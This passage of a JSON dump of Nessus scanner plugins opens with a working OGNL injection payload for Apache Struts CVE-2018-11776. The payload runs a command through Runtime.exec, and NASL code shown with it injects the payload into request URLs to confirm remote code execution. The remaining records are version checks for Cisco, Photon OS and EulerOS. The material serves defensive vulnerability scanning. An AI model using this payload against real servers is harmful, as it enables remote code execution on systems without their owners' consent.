\"%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29%29%7D/\";\n\nfunction namespace_inject(url, payload)\n{\n local_var bits, last, attack_url;\n\n # find the last / and put it after\n bits = split(url, sep:\"/\", keep:TRUE);\n last = max_index(bits) - 1;\n for (var i=0;i<last;i++)\n attack_url = attack_url + bits[i];\n attack_url = attack_url + payload;\n attack_url = attack_url + bits[last];\n\n return attack_url;\n}\n\nforeach var url (urls)\n{\n # first we try the 2.3.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_3);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n var snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). 
Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # next we try the 2.2.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_2);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # and finally, we try a simple redirect namespace injection\n attack_url = namespace_inject(url:url, payload:payload_redirect);\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n report =\n '\\nNessus confirmed this issue by injecting a simple OGNL addition payload'+\n '\\n( ${{57550614+16044095}} ) into a redirect action namespace. 
Below is' +\n '\\nthe response :'+\n '\\n\\n' + snip +\n '\\n' + res[1] +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:41:58", "description": "According to its self-reported version, the Cisco Unified Communications Manager (CUCM) running on the remote device is affected by a remote code execution vulnerability. Please see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "href": "https://www.tenable.com/plugins/nessus/112289", "sourceData": "#TRUSTED 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\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112289);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14042\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability. Please see the included\nCisco BID and the Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14042\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14042.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Communications Manager\");\n\nversion_list = make_list(\n '11.0.1.10000.10',\n '11.5.1.10000.6',\n '12.0.1.10000.10',\n '12.5.0.98000.981');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['display_version'],\n 'bug_id' , \"CSCvm14042\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:10", "description": "An update of 'apache-tomcat' packages of Photon OS has been released.", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Apache PHSA-2018-2.0-0065 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:apache", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0065.NASL", "href": 
"https://www.tenable.com/plugins/nessus/111952", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0065. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111952);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:51\");\n\n script_cve_id(\"CVE-2018-8014\");\n\n script_name(english:\"Photon OS 2.0: Apache PHSA-2018-2.0-0065 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of 'apache-tomcat' packages of Photon OS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-2-65\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93f4e21b\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"apache-tomcat-8.5.31-3.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:40:49", "description": "According to its self-reported version, the Cisco Identity Services Engine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-08-31T00:00:00", "type": "nessus", "title": "Cisco Identity Services Engine Struts2 Namespace Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": 
["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/112219", "sourceData": "#TRUSTED\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112219);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14030\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Identity Services Engine Struts2 Namespace Vulnerability\");\n script_summary(english:\"Checks the Cisco Identity Services Engine Software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Identity Services\nEngine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for\nmore information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Identity Services Engine Software\");\n\nvuln_ranges = [\n { 'min_ver' : '2.0.0.0', 'fix_ver' : '2.0.0.306' },\n { 'min_ver' : '2.0.1.0', 'fix_ver' : '2.0.1.130' },\n { 'min_ver' : '2.1.0.0', 'fix_ver' : '2.1.0.474' },\n { 'min_ver' : '2.2.0.0', 'fix_ver' : '2.2.0.470' },\n { 'min_ver' : '2.3.0.0', 'fix_ver' : '2.3.0.298' },\n { 'min_ver' : '2.4.0.0', 'fix_ver' : '2.4.0.357' }\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\n# ISE version doesn't change when patches are installed, so even if\n# they are on the proper version we have to double check patch level\nrequired_patch = '';\nif (product_info['version'] =~ \"^2\\.4\\.0($|[^0-9])\") required_patch = '2';\nif (product_info['version'] =~ \"^2\\.3\\.0($|[^0-9])\") required_patch = '4';\nif (product_info['version'] =~ \"^2\\.2\\.0($|[^0-9])\") required_patch = '9';\nelse if (product_info['version'] =~ \"^2\\.1\\.0($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0\\.1($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0($|[^0-9])\") required_patch = '7';\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14030\",\n 'fix' , 'See advisory'\n);\n\n# uses required_patch parameters set by above version ranges\ncisco::check_and_report(product_info:product_info, reporting:reporting, workarounds:workarounds, workaround_params:workaround_params, vuln_ranges:vuln_ranges, required_patch:required_patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:42:56", "description": "According to its self-reported version, the Cisco 
Unified Communications Manager IM & Presence Service is affected by a Remote Code Execution vulnerability. Please see the included Cisco BIDs and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "href": "https://www.tenable.com/plugins/nessus/112288", "sourceData": "#TRUSTED\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112288);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14049\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)\");\n script_summary(english:\"Checks the Cisco Unified Communications Manager version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM & Presence Service is affected by a Remote\nCode Execution vulnerability. 
Please see the included Cisco BIDs and\nthe Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14049.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/UCOS/Cisco Unified Presence/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Presence\");\n\nversion_list = make_list('11.0.1', '11.5.1', '12.0.1');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14049\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:44", "description": "According to the version of the tomcat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration.\n Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : tomcat (EulerOS-SA-2018-1227)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", "p-cpe:/a:huawei:euleros:tomcat-webapps", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1227.NASL", "href": "https://www.tenable.com/plugins/nessus/111647", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-8014\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : tomcat (EulerOS-SA-2018-1227)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The defaults settings for the CORS filter provided in\n Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and\n enable 'supportsCredentials' for all origins. 
It is\n expected that users of the CORS filter will have\n configured it appropriately for their environment\n rather than using it in the default configuration.\n Therefore, it is expected that most users will not be\n impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1227\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c1b3c28\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif 